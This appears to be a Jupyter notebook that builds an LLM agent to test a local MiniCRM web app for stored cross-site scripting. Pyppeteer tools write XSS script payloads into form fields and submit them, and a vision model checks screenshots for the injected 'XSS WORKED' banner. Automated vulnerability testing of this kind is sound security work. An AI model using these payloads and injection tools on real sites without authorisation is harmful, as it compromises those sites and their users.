In [ ]:
failed = {"data/extracted_task_workflows/Workflow_1.md":{'failed_steps':[1]},"data/extracted_task_workflows/Workflow_2.md":{'failed_steps':[]}}

In [ ]:
from bs4 import BeautifulSoup


In [ ]:

import os
import shutil
from rich.panel import Panel
def copy_executable_workflow(workflow_path , executable_workflow_dir = "./data/executable_workflows" ):
    workflow = workflow_path.split("/")[-1]    
    executable_workflow_path = os.path.join(executable_workflow_dir  , workflow )
    shutil.copy(src=workflow_path , dst= executable_workflow_path)
    return executable_workflow_path


def clean_dir(executable_workflow_dir):
    dir_ops_logs = []

    if os.path.exists(executable_workflow_dir):
        for filename in os.listdir(executable_workflow_dir):
            file_path = os.path.join(executable_workflow_dir, filename)
            try:
                if os.path.isfile(file_path) or os.path.islink(file_path):
                    os.unlink(file_path)
                    dir_ops_logs.append(f"[green]Deleted file:[/green] {file_path}")
                elif os.path.isdir(file_path):
                    shutil.rmtree(file_path)
                    dir_ops_logs.append(f"[green]Deleted folder:[/green] {file_path}")
            except Exception as e:
                dir_ops_logs.append(f"[red]Failed to delete {file_path}. Reason: {e}[/red]")
    else:
        os.makedirs(executable_workflow_dir)
        dir_ops_logs.append(f"[cyan]Created directory:[/cyan] {executable_workflow_dir}")

    dir_panel = Panel("\n".join(dir_ops_logs) or "[yellow]No existing files to delete[/yellow]",
                      title="🗂️ Directory Cleanup", border_style="magenta")



def get_executable_workflows(failed , executable_workflow_dir = "./data/executable_workflows"):

    clean_dir(executable_workflow_dir)
    executable_workflows = []

    for k , _ in failed.items():
        if len(failed[k]["failed_steps"]) == 0:
            
            k = copy_executable_workflow(k)
            
            executable_workflows.append(k)



    return executable_workflows



In [ ]:
workflow_path = get_executable_workflows(failed)[0]

In [ ]:
# copy_executable_workflow(workflow_path)

In [ ]:
workflow_path

In [ ]:
def parse_form_fields(html):
    soup = BeautifulSoup(html, "html.parser")
    inputs = soup.find_all(['input', 'textarea'])

    # Collect fields with name and type
    field_info = []
    for tag in inputs:
        name = tag.get("name")
        if name:
            field_type = tag.get("type", "text")  # default to text if not specified
            tag_type = tag.name
            field_info.append({"name": name, "type": field_type, "tag": tag_type})
    return field_info


In [ ]:

async def fill_form_fields(page, values: dict):
    """
    Fill out and submit a form using parsed field names and user-provided values.
    Args:
        page: Pyppeteer page object
        values: Dict of field names and their values
    """
    
    
    xss_payload = "<script>alert('XSS')</script>"
    
    for field_name, field_value in values.items():
        
        
        field_value = xss_payload 
        selector = f'input[name="{field_name}"], textarea[name="{field_name}"], select[name="{field_name}"]'
        print(f"Filling: {selector} -> {field_value}")
        try:
            await page.waitForSelector(selector, timeout=2000)

            # Clear the input value using evaluate safely
            await page.evaluate(
                """(selector) => {
                    const el = document.querySelector(selector);
                    if (el) el.value = "";
                }""",
                selector
            )

            # Handle <select> separately if needed
            tag_name = await page.evaluate(
                """(selector) => {
                    const el = document.querySelector(selector);
                    return el ? el.tagName.toLowerCase() : null;
                }""",
                selector
            )

            if tag_name == "select":
                await page.select(selector, field_value)
            else:
                await page.type(selector, field_value)

        except Exception as e:
            print(f"⚠️ Failed to fill {field_name}: {e}")

    # Try to click the submit button
    try:
        submit_selectors = [
            'form button[type="submit"]',
            'form input[type="submit"]',
            'button[type="submit"]',
            'input[type="submit"]'
        ]
        for submit_selector in submit_selectors:
            try:
                await page.waitForSelector(submit_selector, timeout=1000)
                await page.click(submit_selector)
                await page.waitForNavigation(timeout=5000)
                print("✅ Form submitted.")
                return "✅ Form submitted."
            except:
                continue
        return "⚠️ No submit button found."
    except Exception as e:
        return f"⚠️ Failed to submit form: {e}"


In [ ]:
async def XSS_injection_tool(state: dict, form_html: str, values: dict = None):
    """
    Fills out a form with an XSS payload (non-email fields) and submits it.
    Args:
        state: LangGraph agent state with a Puppeteer page
        form_html: HTML string of the form
        values: Optional dict to override the payloads
    """
    fields = parse_form_fields(form_html)
    filtered_values = {k: v for k, v in values.items() if k in fields}
    
    result = await fill_form_fields(state["page"], filtered_values)
    state["last_action"] = result
    return state

# state = await XSS_injection_tool.arun({
#     "state": state,
#     "form_html": form_html,
#     "values": values
# })



In [ ]:

workflow_path = "data/extracted_task_workflows/Workflow_3.md"

with open( workflow_path,"r") as f:
    workflow = f.read()

In [ ]:
workflow

In [ ]:
import llm_bridge
llm = llm_bridge.Bridge()

visited_urls = ['http://127.0.0.1:5000/admin/settings', 'http://127.0.0.1:5000/contacts', 'http://127.0.0.1:5000/contacts/add', 'http://127.0.0.1:5000/dashboard', 'http://127.0.0.1:5000/tickets',
'http://127.0.0.1:5000/tickets/add']


prompt = f"""You are an webapp vulnerability security agent .
you have 2 tools one to inject XSS acript payload into html forms and one to check_the_XSS alert in the urls.. 
now you have the workflow for a successful task , all the links of a website and the tools.

YOUR GOAL : update the workflow such that it includes the 2 tools to check for vulonerability.

INSTRUCTIONS: 
1. Only write concise steps with the urls like the original workflow
2. make sure to write after 'updated_workflow'
3. No need to put submit form if filling form is already there ..
4. if filling form NO need for further verification of input details
5. if there is no html form filling not in workflow for xss exploit.. output only SKIP
6. for observing xss exploit try to check multiple related urls 
7. The xss payload is '<script>  document.body.innerHTML = '<h1 style="color:red">XSS WORKED</h1>';</script>'
visited_urls
= {visited_urls}
old_workflow = {workflow}


updated_workflow = 
"""



response = llm.get_response(prompt = prompt)






In [ ]:
exploit_workflow = response.choices[0].message.content

In [ ]:
exploit_workflow

In [ ]:
wf={}
# wf["task"] = exploit_workflow.split("Workflow")[0]

exploit_workflow = exploit_workflow.replace("updated_workflow" , "")
wf["workflow_steps"] = exploit_workflow.split("Step")





In [ ]:
wf

In [ ]:
try:
    from langchain.tools import tool
except:
    !uv pip install langchain
# langgraph state variable (dict)

state = {
    "page" : None,  # Puppeteer page instance
    "home_url": None,
    "curr_url": None,
    "last_action": None,
    "history": [],
}

In [ ]:
try:
    from pyppeteer import launch
except:
    !uv pip install pyppeteer

import asyncio

In [ ]:
try:
    import langgraph
except:
    !uv pip install langgraph

In [ ]:
home_url = "http://127.0.0.1:5000/"
test_url = "http://127.0.0.1:5000/contacts/add"
 
browser = await launch(headless=True, args=['--no-sandbox', '--disable-setuid-sandbox'])

page = await browser.newPage()
await page.goto(test_url, {'waitUntil': 'networkidle2'})
state['page'] = page


state["home_url"] = home_url
state["curr_url"] = page.url

In [ ]:
page.on('dialog', lambda dialog: asyncio.create_task(dialog.dismiss()))
await page.goto("http://127.0.0.1:5000/contacts")


In [ ]:

await page.screenshot(path="xss.png")


In [ ]:

@tool
async def navigate_to_link(state: dict, relative_url: str):
    """
    Navigate to a selected link (relative path like '/dashboard')
    Args:
        state (dict): Must contain a Puppeteer page object in `state["page"]`
        relative_url (str): e.g. '/dashboard'
    Returns:
        dict: Updated state with last action
    """
    page = state["page"]
    home_url = state["home_url"]
    page.on('dialog', lambda dialog: asyncio.create_task(dialog.dismiss()))

    # Construct absolute URL
    full_url = home_url.rstrip("/") + relative_url

    try:
        await page.goto(full_url, {'waitUntil': 'networkidle2'})
        state["curr_url"] = full_url
        state["last_action"] = f"✅ Navigated to {full_url}"
        return state
    except Exception as e:
        state["last_action"] = f"❌ Failed to navigate to {full_url}: {e}"
        return state



In [ ]:

from bs4 import BeautifulSoup


@tool
async def click_button_by_html(state: dict, html_string: str) -> dict:
    """
    Extract button text from HTML and click it on the current page.
    Args:
        state (dict): Must contain a Puppeteer page object in `state["page"]`
        html_string (str): e.g. '<button type="submit">Save Contact</button>'
    Returns:
        dict: Updated state with last action
    """
    page = state["page"]

    # Extract visible text from the button HTML
    try:
        soup = BeautifulSoup(html_string, 'html.parser')
        target_text = soup.get_text(strip=True)
    except Exception as e:
        state["last_action"] = f"❌ Failed to parse HTML: {e}"
        return state

    # Search all clickable elements
    try:
        buttons = await page.querySelectorAll('button, input[type="button"], input[type="submit"], [onclick]')
        
        for button in buttons:
            text = await page.evaluate('(el) => el.innerText || el.value || el.getAttribute("onclick") || ""', button)
            if text and target_text.lower() in text.strip().lower():
                await button.click()
                state["last_action"] = f"✅ Clicked button with text: {text.strip()}"
                return state
        
        state["last_action"] = f"❌ No button found with text: {target_text}"
        return state
    except Exception as e:
        state["last_action"] = f"❌ Error while clicking button: {e}"
        return state

# await click_button_by_html(state , buttons)


In [ ]:

def parse_form_fields(html):
    soup = BeautifulSoup(html, "html.parser")
    inputs = soup.find_all(['input', 'textarea'])
    field_names = [tag.get("name") for tag in inputs if tag.get("name")]
    return field_names
    

# use this to the the field values for prompt


async def fill_form_fields(page, values: dict):
    """
    Fill out and submit a form using parsed field names and user-provided values.
    Args:
        page: Pyppeteer page object
        values: Dict of field names and their values
    """
    for field_name, field_value in values.items():
        # if field_name != "email":    
        #     field_value = "<script>alert('XSS')</script> "


        selector = f'input[name="{field_name}"], textarea[name="{field_name}"], select[name="{field_name}"]'
        print(f"Filling: {selector} -> {field_value}")
        try:
            await page.waitForSelector(selector, timeout=2000)

            # Clear the input value using evaluate safely
            await page.evaluate(
                """(selector) => {
                    const el = document.querySelector(selector);
                    if (el) el.value = "";
                }""",
                selector
            )

            # Handle <select> separately if needed
            tag_name = await page.evaluate(
                """(selector) => {
                    const el = document.querySelector(selector);
                    return el ? el.tagName.toLowerCase() : null;
                }""",
                selector
            )

            if tag_name == "select":
                await page.select(selector, field_value)
            else:
                await page.type(selector, field_value)

        except Exception as e:
            print(f"⚠️ Failed to fill {field_name}: {e}")

    # Try to click the submit button
    try:
        submit_selectors = [
            'form button[type="submit"]',
            'form input[type="submit"]',
            'button[type="submit"]',
            'input[type="submit"]'
        ]
        for submit_selector in submit_selectors:
            try:
                await page.waitForSelector(submit_selector, timeout=1000)
                await page.click(submit_selector)
                await page.waitForNavigation(timeout=5000)
                return "✅ Form submitted."
            except:
                continue
        return "⚠️ No submit button found."
    except Exception as e:
        return f"⚠️ Failed to submit form: {e}"





In [ ]:
@tool

async def XSS_injection_tool(state: dict, form_html: str, values: dict = None):
    """
    Fills out a form with an XSS payload to all non-email fields and submits it.
    Args:
        state: LangGraph agent state with a Puppeteer page
        form_html: HTML string of the form
        values: Optional dict to override the payloads
        
        vlaues format  = {  
                            name:abc,
                            email:xyv@mail.com ,
                            notes: dummy note
                            
                        }
    """
    # fields = parse_form_fields(form_html)
    fields = values
    filtered_values = {k: v for k, v in values.items() if k in fields}
    print(f"filtered_values : {filtered_values}")
    result = await fill_form_fields(state["page"], filtered_values)
    state["last_action"] = result
    return state


In [ ]:
# import asyncio

# async def fill_form_fields(page, values: dict):
#     """
#     Force-fill form fields with XSS payloads using Pyppeteer.
#     """
#     for field_name in values:
#         selector = f'input[name="{field_name}"], textarea[name="{field_name}"]'
#         payload = "<script>alert('XSS Attack!');</script>"
#         print(selector, payload)
#         try:
#             await page.waitForSelector(selector, timeout=2000)
#             await page.evaluate(
#                 """(selector, value) => {
#                     const el = document.querySelector(selector);
#                     if (el) el.value = value;
#                 }""",
#                 selector,
#                 payload
#             )
#             print(f"✅ Injected payload into {field_name}")
#         except Exception as e:
#             print(f"⚠️ Failed to inject into {field_name}: {e}")

#     # Submit the form
#     try:
#         await page.click('button[type="submit"], input[type="submit"]')
#         await asyncio.sleep(2)  # ⏳ Wait 2 seconds for JS/AJAX to run
#         print("✅ Submit clicked (no navigation).")
#         return "✅ Submit clicked (no navigation)."
#     except Exception as e:
#         print(f"⚠️ Failed to click submit: {e}")
#         return f"⚠️ Failed to click submit: {e}"


In [ ]:
from PIL import Image
import uuid



In [ ]:
from transformers import AutoProcessor, LlavaOnevisionForConditionalGeneration
import torch , torchvision

In [ ]:
model_id = "llava-hf/llava-onevision-qwen2-0.5b-ov-hf"
model = LlavaOnevisionForConditionalGeneration.from_pretrained(
    model_id,
    torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32,
    low_cpu_mem_usage=True,
    device_map="auto",
)
processor = AutoProcessor.from_pretrained(model_id)



In [ ]:
def analyze_xss_image(image_path: str, question: str = "What text do you see in the picture ?"):
    """Uses the LLaVA vision-language model to analyze the screenshot."""
    image = Image.open(image_path).convert("RGB")

    # Chat template for multimodal input
    conversation = [
        {
            "role": "user",
            "content": [
                {"type": "text", "text": question},
                {"type": "image"}
            ]
        }
    ]

    prompt = processor.apply_chat_template(conversation, add_generation_prompt=True)
    inputs = processor(text=prompt, images=image, return_tensors="pt").to(model.device)

    output = model.generate(**inputs, max_new_tokens=100)
    decoded = processor.batch_decode(output, skip_special_tokens=True)[0]
    print(decoded)
    return decoded

In [ ]:
# print(analyze_xss_image("xss.png"))

In [ ]:

from pprint import pprint
def check_with_llm(caption):
    print(caption)
    json_xss = """{'xss_triggered':True or False}"""


    json_xss_false = {'xss_triggered':False}

    xss_verification_prompt = f"""
           you are an smart tool that takes the visual caption of a web page after visiting a potentially XSS-injected URL:

        your job is to:
        1. check if the xss payload worked , payload = '<script>  document.body.innerHTML = '<h1 style="color:red">XSS WORKED</h1>';</script>'

        2. if payload worked successfully the ouput the  json 
        for example if caption : 
        What text do you see in the picture ?assistant
        The text in the picture reads "XSS WORKED". it worked
        3.if in the caption there is any mention of xss in red , or xss then injection worked  , otherwise it did not work 

        INSTRUCTION
        THINK  THEN RETURN THE DICTIONARY with value True if it workd and False if it did not work


        CAPTION : {caption}

        output will be in the format
        {json_xss}

        


    """
    pprint(xss_verification_prompt)
    llm = llm_bridge.Bridge()
    response = llm.get_response(prompt = xss_verification_prompt)

    response = response.choices[0].message.content

    print(response)
    return response


    
# caption = """user 
# What text do you see in the picture ?assistant
# The image shows a screenshot of a user interface for a dashboard named "MiniCRM Dashboard." 
# The interface is designed to be user-friendly, with a clean layout and a simple color scheme.
# At the top, there are tabs labeled "Dashboard," "Contacts," "Tickets," and "Admin," suggesting that the dashboard offers various sections
# for managing different aspects of the MiniCRM system.
# Below the tabs, there is a welcome message that reads "Welcome to the MiniCRM Dashboard." The main content area of the"""
# result = get_json_from_response(check_with_llm(caption))
# result['xss_triggered']

In [ ]:
import re
import ast

def get_json_from_response(response):
    match = re.search(r"(\{.*?\})", response)
    if match:
        dict_string = match.group(1)
        print("Raw match:", dict_string)

        try:
            # Parse safely using ast.literal_eval
            data = ast.literal_eval(dict_string)
            print("Extracted dictionary:", data)
            return data

        except Exception as e:
            print(f"Error parsing dict: {e}")
    else:
        print("No dictionary found in the string.")

    return None


In [ ]:
def verify_xss( image_path):
    


    caption = analyze_xss_image(image_path)
    response = check_with_llm(caption = caption)

    result = get_json_from_response(response)


    
    
    return result



In [ ]:
# xss_triggered = False
# screenshot_path  = "./output/xss_proof.png"
# await page.screenshot(path= screenshot_path)

# result = verify_xss(image_path = screenshot_path)

# result = "✅ XSS alert triggered!" if (result['xss_triggered'] == True) else "❌ No XSS alert detected."
# print(result)


In [ ]:
page.url

In [ ]:
from langchain.tools import tool  


@tool
async def check_XSS_alert(state: dict) -> str:
    """
    Checks if an alert (e.g., from an XSS payload) was triggered on the page.

    Args:
        state: A dictionary containing Playwright page context.

    Returns:
        str: "✅ XSS alert triggered!" if xss was observed,
             otherwise "❌ No XSS alert detected."
    """
    page = state["page"]
    xss_triggered = False
    screenshot_path  = "./output/xss_proof.png"
    await page.screenshot(path= screenshot_path)

    result = verify_xss(image_path = screenshot_path)

    result = "✅ XSS alert triggered!" if (result['xss_triggered'] == True) else "❌ No XSS alert detected."
    print(result)

    state["last_action"] = result
    state["xss_detection"].append({'page':page.url , 'result':result})
    return state


In [ ]:


tools = [
    navigate_to_link,
    click_button_by_html,
    XSS_injection_tool,
    check_XSS_alert
]

state['tools'] = tools

In [ ]:
prompt = f"""
You are a workflow planner agent.

## Objective:
You are given:
1. A workflow to complete.
2. A list of natural language steps that must be followed in sequence.
3. A list of available tools (functions) in JSON format — each tool has a name and a description.

Your job:
        - Match each step with the most appropriate tool.
        - Describe the specific action and **arguments/parameters** the tool should use.
        - fill with XSS payload to all non-email fields (i.e notes , name etc) -- XSS payload '<script>  document.body.innerHTML = '<h1 style="color:red">XSS WORKED</h1>';</script>'
        - Include details like which values are passed in (if relevant).
        - if there is a form to fill do not have a step to click button to subimt form as filling it would submit it automaticaly
        - DO NOT REPEAT SAME STEPS
        - if there are multiple steps in a singe step separate them into multiple steps 
        - DO NOT DO THIS" Verify XSS alert on contacts page -> check_XSS_alert -> Check if an alert was triggered on the page at URL 'http://127.0.0.1:5000/contacts' "
        - DO THIS" Verify XSS alert on contacts page -> navigate_to_url 'http://127.0.0.1:5000/contacts' -> check_XSS_alert -> Check if an alert was triggered  "

        For example : verify using checkxss alert after navigating to one of the following URLs:
        http://127.0.0.1:5000/dashboard, http://127.0.0.1:5000/contacts, 
        separate this to 
        step : navigate_to_link http://127.0.0.1:5000/dashboard .
        step:  verify using check_xss_alert , 
        step : navigate_to_link ://127.0.0.1:5000/contacts . 
        step : verify using check_xss_alert
        


## Steps:
{wf["workflow_steps"]}

## Input Values (e.g. for forms):
{wf.get("values", {})}

## Available Tools (in JSON):
{state["tools"]}

---

## Output format:
Produce a **single-line string**, no newlines. For each step, use this format:

`StepDescription -> ToolName -> DetailedAction`

Where:
- `StepDescription` is a natural language summary of the step.
- `ToolName` is the name of the tool to use.
- `DetailedAction` explains exactly what the tool should do, including what arguments or values are used (if applicable).

Separate each step with ` || ` (double pipe). Do not add newlines or extra commentary.

---

## Example Output:
Navigate to the contact creation page -> navigate_to_link -> Go to relative URL '/contacts/add' from base URL || Fill out the form with name, email, and notes -> form_filling_tool -> Fill 'name' with 'John Doe', 'email' with 'john@example.com', and 'notes' with 'New lead from campaign' || Click the submit button -> click_button_by_html -> Find and click button with text 'Save Contact' and type='submit'

Only return the result in the required format.
"""


prompt

In [ ]:
import llm_bridge

llm = llm_bridge.Bridge()



response = llm.get_response(prompt)

In [ ]:
toolflow = response.choices[0].message.content


In [ ]:
toolflow = toolflow.replace("\"", "")
toolflow

In [ ]:
tool_flow_list = toolflow.split("||")
tool_flow_list

In [ ]:
tool_registry = {
    "navigate_to_link": navigate_to_link,
    "XSS_injection_tool": XSS_injection_tool,
    "click_button_by_html": click_button_by_html,
    "check_XSS_alert": check_XSS_alert,
}


# tools = [
#     navigate_to_link,
#     click_button_by_html,
#     XSS_injection_tool,
#     check_XSS_alert
# ]


In [ ]:
import re


print(tool_flow_list)
parsed_plan = []
for s in tool_flow_list:
    parsed = {}

    match = re.match(r"^(.*?)\s*->", s)
    if match:
        step_description = match.group(1).strip()
        # print(step_description)

    match = re.match(r"^[^>]*->\s*([^>]+?)\s*->", s)
    if match:
        tool_name = match.group(1).strip()
        # print(tool_name)

    match = re.match(r"^[^>]*->[^>]*->\s*(.*)$", s)
    if match:
        action = match.group(1).strip()
        # print(action)
        
    parsed['step'] = step_description
    parsed['tool'] = tool_name
    parsed['action'] = action
    print(parsed)
    parsed_plan.append(parsed)
    
    
    

In [ ]:
parsed_plan

In [ ]:
def get_json_from_output(text):
    match = re.search(r'```json\s*(\{.*?\})\s*```', text, re.DOTALL)

    if match:
        json_str = match.group(1)
        json_data = json.loads(json_str)
        print(json_data)
    else:
        print("No JSON found.")
    
    return json_data
content = await page.content()


In [ ]:
!uv pip install langchain_groq

In [ ]:
from langchain_core.prompts import PromptTemplate
from langchain.chains import LLMChain
import json

# 1. Define your LLM
from langchain_groq import ChatGroq
from langchain.prompts import PromptTemplate
from langchain.chains import LLMChain
from dotenv import load_dotenv
import os

load_dotenv(dotenv_path="./.env")


GROQ_API_KEY = os.environ.get("GROQ_API_KEY")

# Groq model setup (e.g., Mixtral)
llm = ChatGroq(
    temperature=0,
    model_name="llama-3.3-70b-versatile",  # or gemma-7b-it, llama3-8b-8192
    groq_api_key=GROQ_API_KEY # or set via env variable
)









# 2. Define the agent's prompt
prompt = PromptTemplate.from_template("""
You are an automation agent. Your job is to decide which tool to use and what values to fill in, based on the page's HTML and the current step.

Available tools:
- navigate_to_link
- XSS_injection_tool
- click_button_by_html
- check_XSS_alert

Each tool has its own input format and make sure to adhere to these formats:
- navigate_to_link: {{ "relative_url": "..." }}
- XSS_injection_tool: {{ "form_html": "...", "values": {{ "name": "...", "email": "...", "notes": "..." }} }}
- click_button_by_html: {{ "button_html": "..." }}
- check_XSS_alert: {{ }}  // Use this after submitting a form with an XSS payload


Reply with a JSON object:
{{ "tool": "...", "tool_args": {{ ... }} }}



for example if the action requires xss tool
{{ "tool": "XSS_injection_tool", "tool_args": {{ "form_html": "...", "values": {{ "name": "John", "email": "john@example.com", "notes": "test" }} }} }}

only when filling form fill the empty values with some examples 


Step: {step_description}

Action for the agent to do : {step_action}
Current Page HTML:
{page_html}


- Choose the correct tool and provide only the **required minimal arguments**.
- Wrap the final output in **markdown-style fenced code block** with `json`, like this:
- fill the form values with dummy names

```json
```




""")






# 3. Wrap in LLMChain
agent = LLMChain(llm=llm, prompt=prompt)

# 4. Your function with the agent integrated
async def run_plan(parsed_plan, initial_page_html):
    state = {
        "home_url":"http://127.0.0.1:5000/",
        "page":page,
        "page_html": initial_page_html,
        "current_step": 0,
        "history": [],
        "xss_detection":[]
    }

    for idx, step_info in enumerate(parsed_plan):
        print(f"\n➡️ Step {idx+1}: {step_info['step']}")

        page_html = state["page_html"]
        step_description = step_info["step"]
        step_action =  step_info["action"]
        # 5. LLM agent input
        agent_input = {
            "page_html": page_html,
            "step_description": step_description,
            "step_action": step_action
            
        }

        # 6. Use LLM agent to choose tool and args
        # decision_raw = await agent.ainvoke(agent_input)
        # print(decision_raw)
        # decision = json.loads(decision_raw["text"]) 

        try:
            decision_raw = await agent.ainvoke(agent_input)
            print(f"AGENT OUTPUT : {decision_raw} \n\n")
             # assumes LLMChain returns text field
            
        except Exception as e:
            print(f"❌ Failed to get response from agent: {e}")
            break


        try:
            decision = get_json_from_output(decision_raw["text"]) 
            print(f" EXTRACTED JSON : {decision}")
        except Exception as e:
            print(f"❌ Failed to parse agent output: {e}")
        
        

        tool_name = decision.get("tool")
        tool_args = decision.get("tool_args", {})
        tool_args['state'] = state
        tool_func = tool_registry.get(tool_name)


        print(f"TOOL DETAILS : TOOL_NAME -> {tool_name} | TOOL_ARGS  -> {tool_args} | REGISTRY FUNC -> {tool_func} ")

        if tool_func is None:
            print(f"❌ Tool '{tool_name}' not found")
            break

        result = await tool_func.ainvoke(tool_args)
        new_page_html = result.get("new_page_html", page_html)
            
        
        
        
        try:
            print(f"🔧 Running tool: {tool_name}")
            
            result = await tool_func.ainvoke(tool_args)
            new_page_html = result.get("new_page_html", page_html)

        except Exception as e:
            print(f"❌ Error running tool: {e}")
            break

        # 7. Update state
        state["history"].append({
            "step": step_info["step"],
            "tool": tool_name,
            "args": tool_args,
            "result": result
        })
        state["page_html"] = new_page_html
        state["current_step"] += 1

    print("✅ All steps executed.")
    return state


In [ ]:
state = await run_plan(parsed_plan, content)

In [ ]:
state["xss_detection"]